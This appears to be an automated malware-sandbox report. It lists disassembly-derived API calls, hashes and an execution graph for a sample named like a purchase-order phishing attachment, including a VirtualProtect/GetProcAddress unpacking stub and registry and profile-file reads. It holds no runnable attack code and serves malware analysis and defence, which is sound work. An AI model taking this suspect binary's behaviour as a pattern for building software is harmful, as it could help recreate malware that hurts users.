                                                              • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                              • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                              • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                              APIs
                                                                • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ??2@$memset
                                                              • String ID:
                                                              • API String ID: 1860491036-0
                                                              • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                              • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                              • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                              • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                              APIs
                                                              • wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                              • free.MSVCRT ref: 0040A908
                                                              • free.MSVCRT ref: 0040A92B
                                                              • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: free$memcpy$mallocwcslen
                                                              • String ID:
                                                              • API String ID: 726966127-0
                                                              • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                              • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                              • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                              • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                              APIs
                                                              • wcslen.MSVCRT ref: 0040B1DE
                                                              • free.MSVCRT ref: 0040B201
                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                              • free.MSVCRT ref: 0040B224
                                                              • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: free$memcpy$mallocwcslen
                                                              • String ID:
                                                              • API String ID: 726966127-0
                                                              • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                              • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                              • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                              • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                              APIs
                                                              • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                              • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                              • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                              • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcmp$memcpy
                                                              • String ID:
                                                              • API String ID: 231171946-0
                                                              • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                              • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                              • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                              • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                              APIs
                                                              • strlen.MSVCRT ref: 0040B0D8
                                                              • free.MSVCRT ref: 0040B0FB
                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                              • free.MSVCRT ref: 0040B12C
                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: free$memcpy$mallocstrlen
                                                              • String ID:
                                                              • API String ID: 3669619086-0
                                                              • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                              • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                              • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                              • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                              • malloc.MSVCRT ref: 00417407
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                              • free.MSVCRT ref: 00417425
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$freemalloc
                                                              • String ID:
                                                              • API String ID: 2605342592-0
                                                              • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                              • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                              • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                              • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: wcslen$wcscat$wcscpy
                                                              • String ID:
                                                              • API String ID: 1961120804-0
                                                              • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                              • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                              • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                              • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                              Execution Graph

                                                              Execution Coverage:2.4%
                                                              Dynamic/Decrypted Code Coverage:19.8%
                                                              Signature Coverage:0.5%
                                                              Total number of Nodes:872
                                                              Total number of Limit Nodes:22
                                                              execution_graph 34103 40fc40 70 API calls 34276 403640 21 API calls 34104 427fa4 42 API calls 34277 412e43 _endthreadex 34278 425115 76 API calls __fprintf_l 34279 43fe40 133 API calls 34107 425115 83 API calls __fprintf_l 34108 401445 memcpy memcpy DialogBoxParamA 34109 440c40 34 API calls 34111 411853 RtlInitializeCriticalSection memset 34112 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34285 40a256 13 API calls 34287 432e5b 17 API calls 34289 43fa5a 20 API calls 34114 401060 41 API calls 34292 427260 CloseHandle memset memset 33166 410c68 FindResourceA 33167 410c81 SizeofResource 33166->33167 33170 410cae 33166->33170 33168 410c92 LoadResource 33167->33168 33167->33170 33169 410ca0 LockResource 33168->33169 33168->33170 33169->33170 34294 405e69 14 API calls 34119 433068 15 API calls __fprintf_l 34296 414a6d 18 API calls 34297 43fe6f 134 API calls 34121 424c6d 15 API calls __fprintf_l 34298 426741 19 API calls 34123 440c70 17 API calls 34124 443c71 44 API calls 34127 427c79 24 API calls 34301 416e7e memset __fprintf_l 34131 42800b 47 API calls 34132 425115 85 API calls __fprintf_l 34304 41960c 61 API calls 34133 43f40c 122 API calls __fprintf_l 34136 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34137 43f81a 20 API calls 34139 414c20 memset memset 34140 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34308 414625 18 API calls 34309 404225 modf 34310 403a26 strlen WriteFile 34312 40422a 12 API calls 34316 427632 memset memset memcpy 34317 40ca30 59 API calls 34318 404235 26 API calls 34141 42ec34 61 API calls __fprintf_l 34142 425115 76 API calls __fprintf_l 34319 425115 77 API calls __fprintf_l 34321 44223a 38 API calls 34148 43183c 112 API calls 34322 44b2c5 _onexit __dllonexit 34327 42a6d2 memcpy __allrem 34150 405cda 65 API calls 34335 43fedc 138 API calls 34336 4116e1 16 API calls __fprintf_l 34153 4244e6 19 API calls 34155 42e8e8 127 API calls __fprintf_l 34156 4118ee RtlLeaveCriticalSection 34341 43f6ec 22 API calls 34158 425115 119 API calls __fprintf_l 33156 410cf3 EnumResourceNamesA 34344 4492f0 memcpy memcpy 34346 43fafa 18 API calls 34348 4342f9 15 API calls __fprintf_l 34159 4144fd 19 API calls 34350 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34351 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34354 443a84 _mbscpy 34356 43f681 17 API calls 34162 404487 22 API calls 34358 415e8c 16 API calls __fprintf_l 34166 411893 RtlDeleteCriticalSection __fprintf_l 34167 41a492 42 API calls 34362 403e96 34 API calls 34363 410e98 memset SHGetPathFromIDList SendMessageA 34169 426741 109 API calls __fprintf_l 34170 4344a2 18 API calls 34171 4094a2 10 API calls 34366 4116a6 15 API calls __fprintf_l 34367 43f6a4 17 API calls 34368 440aa3 20 API calls 34370 427430 45 API calls 34174 4090b0 7 API calls 34175 4148b0 15 API calls 34177 4118b4 RtlEnterCriticalSection 34178 4014b7 CreateWindowExA 34179 40c8b8 19 API calls 34181 4118bf RtlTryEnterCriticalSection 34375 42434a 18 API calls __fprintf_l 34377 405f53 12 API calls 34189 43f956 59 API calls 34191 40955a 17 API calls 34192 428561 36 API calls 34193 409164 7 API calls 34381 404366 19 API calls 34385 40176c ExitProcess 34388 410777 42 API calls 34198 40dd7b 51 API calls 34199 425d7c 16 API calls __fprintf_l 34390 43f6f0 25 API calls 34391 42db01 22 API calls 34200 412905 15 API calls __fprintf_l 34392 403b04 54 API calls 34393 405f04 SetDlgItemTextA GetDlgItemTextA 34394 44b301 ??3@YAXPAX 34397 4120ea 14 API calls 3 library calls 34398 40bb0a 8 API calls 34400 413f11 strcmp 34204 434110 17 API calls __fprintf_l 34207 425115 108 API calls __fprintf_l 34401 444b11 _onexit 34209 425115 76 API calls __fprintf_l 34212 429d19 10 API calls 34404 444b1f __dllonexit 34405 409f20 _strcmpi 34214 42b927 31 API calls 34408 433f26 19 API calls __fprintf_l 34409 44b323 FreeLibrary 34410 427f25 46 API calls 34411 43ff2b 17 API calls 34412 43fb30 19 API calls 34221 414d36 16 API calls 34223 40ad38 7 API calls 34414 433b38 16 API calls __fprintf_l 34094 44b33b 34095 44b344 ??3@YAXPAX 34094->34095 34096 44b34b 34094->34096 34095->34096 34097 44b354 ??3@YAXPAX 34096->34097 34098 44b35b 34096->34098 34097->34098 34099 44b364 ??3@YAXPAX 34098->34099 34100 44b36b 34098->34100 34099->34100 34101 44b374 ??3@YAXPAX 34100->34101 34102 44b37b 34100->34102 34101->34102 34227 426741 21 API calls 34228 40c5c3 125 API calls 34230 43fdc5 17 API calls 34415 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34233 4161cb memcpy memcpy memcpy memcpy 33171 44b3cf 33172 44b3e6 33171->33172 33177 44b454 33171->33177 33172->33177 33184 44b40e GetModuleHandleA 33172->33184 33174 44b45d GetModuleHandleA 33178 44b467 33174->33178 33175 44b49a 33197 44b49f 33175->33197 33177->33174 33177->33175 33177->33178 33178->33177 33179 44b487 GetProcAddress 33178->33179 33179->33177 33180 44b405 33180->33177 33180->33178 33181 44b428 GetProcAddress 33180->33181 33181->33177 33182 44b435 VirtualProtect 33181->33182 33182->33177 33183 44b444 VirtualProtect 33182->33183 33183->33177 33185 44b417 33184->33185 33187 44b454 33184->33187 33216 44b42b GetProcAddress 33185->33216 33189 44b45d GetModuleHandleA 33187->33189 33190 44b49a 33187->33190 33196 44b467 33187->33196 33188 44b41c 33188->33187 33192 44b428 GetProcAddress 33188->33192 33189->33196 33191 44b49f 777 API calls 33190->33191 33191->33190 33192->33187 33193 44b435 VirtualProtect 33192->33193 33193->33187 33194 44b444 VirtualProtect 33193->33194 33194->33187 33195 44b487 GetProcAddress 33195->33187 33196->33187 33196->33195 33198 444c4a 33197->33198 33199 444c56 GetModuleHandleA 33198->33199 33200 444c68 __set_app_type __p__fmode __p__commode 33199->33200 33202 444cfa 33200->33202 33203 444d02 __setusermatherr 33202->33203 33204 444d0e 33202->33204 33203->33204 33225 444e22 _controlfp 33204->33225 33206 444d13 _initterm __getmainargs _initterm 33207 444d6a GetStartupInfoA 33206->33207 33209 444d9e GetModuleHandleA 33207->33209 33226 40cf44 33209->33226 33213 444dcf _cexit 33215 444e04 33213->33215 33214 444dc8 exit 33214->33213 33215->33175 33217 44b454 33216->33217 33218 44b435 VirtualProtect 33216->33218 33220 44b45d GetModuleHandleA 33217->33220 33221 44b49a 33217->33221 33218->33217 33219 44b444 VirtualProtect 33218->33219 33219->33217 33224 44b467 33220->33224 33222 44b49f 777 API calls 33221->33222 33222->33221 33223 44b487 GetProcAddress 33223->33224 33224->33217 33224->33223 33225->33206 33277 404a99 LoadLibraryA 33226->33277 33228 40cf60 33229 40cf64 33228->33229 33285 410d0e 33228->33285 33229->33213 33229->33214 33231 40cf6f 33289 40ccd7 ??2@YAPAXI 33231->33289 33233 40cf9b 33303 407cbc 33233->33303 33238 40cfc4 33321 409825 memset 33238->33321 33239 40cfd8 33326 4096f4 memset 33239->33326 33244 40d181 ??3@YAXPAX 33246 40d1b3 33244->33246 33247 40d19f DeleteObject 33244->33247 33245 407e30 _strcmpi 33248 40cfee 33245->33248 33350 407948 free free 33246->33350 33247->33246 33250 40cff2 RegDeleteKeyA 33248->33250 33251 40d007 EnumResourceTypesA 33248->33251 33250->33244 33253 40d047 33251->33253 33254 40d02f MessageBoxA 33251->33254 33252 40d1c4 33351 4080d4 free 33252->33351 33256 40d0a0 CoInitialize 33253->33256 33331 40ce70 33253->33331 33254->33244 33348 40cc26 strncat memset RegisterClassA CreateWindowExA 33256->33348 33258 40d1cd 33352 407948 free free 33258->33352 33260 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33349 40c256 PostMessageA 33260->33349 33263 40d061 ??3@YAXPAX 33263->33246 33266 40d084 DeleteObject 33263->33266 33264 40d09e 33264->33256 33266->33246 33269 40d0f9 GetMessageA 33270 40d17b CoUninitialize 33269->33270 33271 40d10d 33269->33271 33270->33244 33272 40d113 TranslateAccelerator 33271->33272 33274 40d145 IsDialogMessage 33271->33274 33275 40d139 IsDialogMessage 33271->33275 33272->33271 33273 40d16d GetMessageA 33272->33273 33273->33270 33273->33272 33274->33273 33276 40d157 TranslateMessage DispatchMessageA 33274->33276 33275->33273 33275->33274 33276->33273 33278 404ac4 GetProcAddress 33277->33278 33279 404aec 33277->33279 33280 404ad4 33278->33280 33281 404add FreeLibrary 33278->33281 33283 404b13 33279->33283 33284 404afc MessageBoxA 33279->33284 33280->33281 33281->33279 33282 404ae8 33281->33282 33282->33279 33283->33228 33284->33228 33286 410d17 LoadLibraryA 33285->33286 33287 410d3c 33285->33287 33286->33287 33288 410d2b GetProcAddress 33286->33288 33287->33231 33288->33287 33290 40cd08 ??2@YAPAXI 33289->33290 33292 40cd26 33290->33292 33293 40cd2d 33290->33293 33360 404025 6 API calls 33292->33360 33295 40cd66 33293->33295 33296 40cd59 DeleteObject 33293->33296 33353 407088 33295->33353 33296->33295 33298 40cd6b 33356 4019b5 33298->33356 33301 4019b5 strncat 33302 40cdbf _mbscpy 33301->33302 33302->33233 33362 407948 free free 33303->33362 33307 407a1f malloc memcpy free free 33309 407cf7 33307->33309 33308 407ddc 33316 407e04 33308->33316 33375 407a1f 33308->33375 33309->33307 33309->33308 33311 407d7a free 33309->33311 33309->33316 33366 40796e 7 API calls 33309->33366 33367 406f30 33309->33367 33311->33309 33363 407a55 33316->33363 33317 407e30 33318 407e57 33317->33318 33319 407e38 33317->33319 33318->33238 33318->33239 33319->33318 33320 407e41 _strcmpi 33319->33320 33320->33318 33320->33319 33381 4097ff 33321->33381 33323 409854 33386 409731 33323->33386 33327 4097ff 3 API calls 33326->33327 33328 409723 33327->33328 33406 40966c 33328->33406 33420 4023b2 33331->33420 33337 40ced3 33509 40cdda 7 API calls 33337->33509 33338 40cece 33341 40cf3f 33338->33341 33461 40c3d0 memset GetModuleFileNameA strrchr 33338->33461 33341->33263 33341->33264 33344 40ceed 33488 40affa 33344->33488 33348->33260 33349->33269 33350->33252 33351->33258 33352->33229 33361 406fc7 memset _mbscpy 33353->33361 33355 40709f CreateFontIndirectA 33355->33298 33357 4019e1 33356->33357 33358 4019c2 strncat 33357->33358 33359 4019e5 memset LoadIconA 33357->33359 33358->33357 33359->33301 33360->33293 33361->33355 33362->33309 33364 407a65 33363->33364 33365 407a5b free 33363->33365 33364->33317 33365->33364 33366->33309 33368 406f37 malloc 33367->33368 33369 406f7d 33367->33369 33371 406f73 33368->33371 33372 406f58 33368->33372 33369->33309 33371->33309 33373 406f6c free 33372->33373 33374 406f5c memcpy 33372->33374 33373->33371 33374->33373 33376 407a38 33375->33376 33377 407a2d free 33375->33377 33378 406f30 3 API calls 33376->33378 33379 407a43 33377->33379 33378->33379 33380 40796e 7 API calls 33379->33380 33380->33316 33397 406f96 GetModuleFileNameA 33381->33397 33383 409805 strrchr 33384 409814 33383->33384 33385 409817 _mbscat 33383->33385 33384->33385 33385->33323 33398 44b090 33386->33398 33391 40930c 3 API calls 33392 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33391->33392 33393 4097c5 LoadStringA 33392->33393 33394 4097db 33393->33394 33394->33393 33396 4097f3 33394->33396 33405 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33394->33405 33396->33244 33397->33383 33399 40973e _mbscpy _mbscpy 33398->33399 33400 40930c 33399->33400 33401 44b090 33400->33401 33402 409319 memset GetPrivateProfileStringA 33401->33402 33403 409374 33402->33403 33404 409364 WritePrivateProfileStringA 33402->33404 33403->33391 33404->33403 33405->33394 33416 406f81 GetFileAttributesA 33406->33416 33408 409675 33409 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33408->33409 33415 4096ee 33408->33415 33417 409278 GetPrivateProfileStringA 33409->33417 33411 4096c9 33418 409278 GetPrivateProfileStringA 33411->33418 33413 4096da 33419 409278 GetPrivateProfileStringA 33413->33419 33415->33245 33416->33408 33417->33411 33418->33413 33419->33415 33511 409c1c 33420->33511 33423 401e69 memset 33550 410dbb 33423->33550 33426 401ec2 33580 4070e3 strlen _mbscat _mbscpy _mbscat 33426->33580 33427 401ed4 33565 406f81 GetFileAttributesA 33427->33565 33430 401ee6 strlen strlen 33432 401f15 33430->33432 33433 401f28 33430->33433 33581 4070e3 strlen _mbscat _mbscpy _mbscat 33432->33581 33566 406f81 GetFileAttributesA 33433->33566 33436 401f35 33567 401c31 33436->33567 33439 401f75 33579 410a9c RegOpenKeyExA 33439->33579 33441 401c31 7 API calls 33441->33439 33442 401f91 33443 402187 33442->33443 33444 401f9c memset 33442->33444 33446 402195 ExpandEnvironmentStringsA 33443->33446 33447 4021a8 _strcmpi 33443->33447 33582 410b62 RegEnumKeyExA 33444->33582 33591 406f81 GetFileAttributesA 33446->33591 33447->33337 33447->33338 33449 40217e RegCloseKey 33449->33443 33450 401fd9 atoi 33451 401fef memset memset sprintf 33450->33451 33454 401fc9 33450->33454 33583 410b1e 33451->33583 33454->33449 33454->33450 33455 402165 33454->33455 33456 402076 memset memset strlen strlen 33454->33456 33457 4070e3 strlen _mbscat _mbscpy _mbscat 33454->33457 33458 4020dd strlen strlen 33454->33458 33459 406f81 GetFileAttributesA 33454->33459 33460 402167 _mbscpy 33454->33460 33590 410b62 RegEnumKeyExA 33454->33590 33455->33449 33456->33454 33457->33454 33458->33454 33459->33454 33460->33449 33462 40c422 33461->33462 33463 40c425 _mbscat _mbscpy _mbscpy 33461->33463 33462->33463 33464 40c49d 33463->33464 33465 40c512 33464->33465 33466 40c502 GetWindowPlacement 33464->33466 33467 40c538 33465->33467 33612 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33465->33612 33466->33465 33605 409b31 33467->33605 33471 40ba28 33472 40ba87 33471->33472 33478 40ba3c 33471->33478 33615 406c62 LoadCursorA SetCursor 33472->33615 33474 40ba8c 33616 4107f1 33474->33616 33619 403c16 33474->33619 33695 410a9c RegOpenKeyExA 33474->33695 33696 404734 33474->33696 33704 404785 33474->33704 33475 40ba43 _mbsicmp 33475->33478 33476 40baa0 33477 407e30 _strcmpi 33476->33477 33481 40bab0 33477->33481 33478->33472 33478->33475 33707 40b5e5 10 API calls 33478->33707 33479 40bafa SetCursor 33479->33344 33481->33479 33482 40baf1 qsort 33481->33482 33482->33479 34069 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33488->34069 33490 40b00e 33491 40b016 33490->33491 33492 40b01f GetStdHandle 33490->33492 34070 406d1a CreateFileA 33491->34070 33494 40b01c 33492->33494 33495 40b035 33494->33495 33496 40b12d 33494->33496 34071 406c62 LoadCursorA SetCursor 33495->34071 34075 406d77 9 API calls 33496->34075 33499 40b136 33510 40c580 28 API calls 33499->33510 33500 40b087 33507 40b0a1 33500->33507 34073 40a699 12 API calls 33500->34073 33501 40b042 33501->33500 33501->33507 34072 40a57c strlen WriteFile 33501->34072 33504 40b0d6 33505 40b116 CloseHandle 33504->33505 33506 40b11f SetCursor 33504->33506 33505->33506 33506->33499 33507->33504 34074 406d77 9 API calls 33507->34074 33509->33338 33510->33341 33523 409a32 33511->33523 33514 409c80 memcpy memcpy 33515 409cda 33514->33515 33515->33514 33516 409d18 ??2@YAPAXI ??2@YAPAXI 33515->33516 33520 408db6 12 API calls 33515->33520 33518 409d54 ??2@YAPAXI 33516->33518 33519 409d8b 33516->33519 33518->33519 33533 409b9c 33519->33533 33520->33515 33522 4023c1 33522->33423 33524 409a44 33523->33524 33525 409a3d ??3@YAXPAX 33523->33525 33526 409a52 33524->33526 33527 409a4b ??3@YAXPAX 33524->33527 33525->33524 33528 409a63 33526->33528 33529 409a5c ??3@YAXPAX 33526->33529 33527->33526 33530 409a83 ??2@YAPAXI ??2@YAPAXI 33528->33530 33531 409a73 ??3@YAXPAX 33528->33531 33532 409a7c ??3@YAXPAX 33528->33532 33529->33528 33530->33514 33531->33532 33532->33530 33534 407a55 free 33533->33534 33535 409ba5 33534->33535 33536 407a55 free 33535->33536 33537 409bad 33536->33537 33538 407a55 free 33537->33538 33539 409bb5 33538->33539 33540 407a55 free 33539->33540 33541 409bbd 33540->33541 33542 407a1f 4 API calls 33541->33542 33543 409bd0 33542->33543 33544 407a1f 4 API calls 33543->33544 33545 409bda 33544->33545 33546 407a1f 4 API calls 33545->33546 33547 409be4 33546->33547 33548 407a1f 4 API calls 33547->33548 33549 409bee 33548->33549 33549->33522 33551 410d0e 2 API calls 33550->33551 33552 410dca 33551->33552 33553 410dfd memset 33552->33553 33592 4070ae 33552->33592 33554 410e1d 33553->33554 33595 410a9c RegOpenKeyExA 33554->33595 33557 401e9e strlen strlen 33557->33426 33557->33427 33559 410e4a 33560 410e7f _mbscpy 33559->33560 33596 410d3d _mbscpy 33559->33596 33560->33557 33562 410e5b 33597 410add RegQueryValueExA 33562->33597 33564 410e73 RegCloseKey 33564->33560 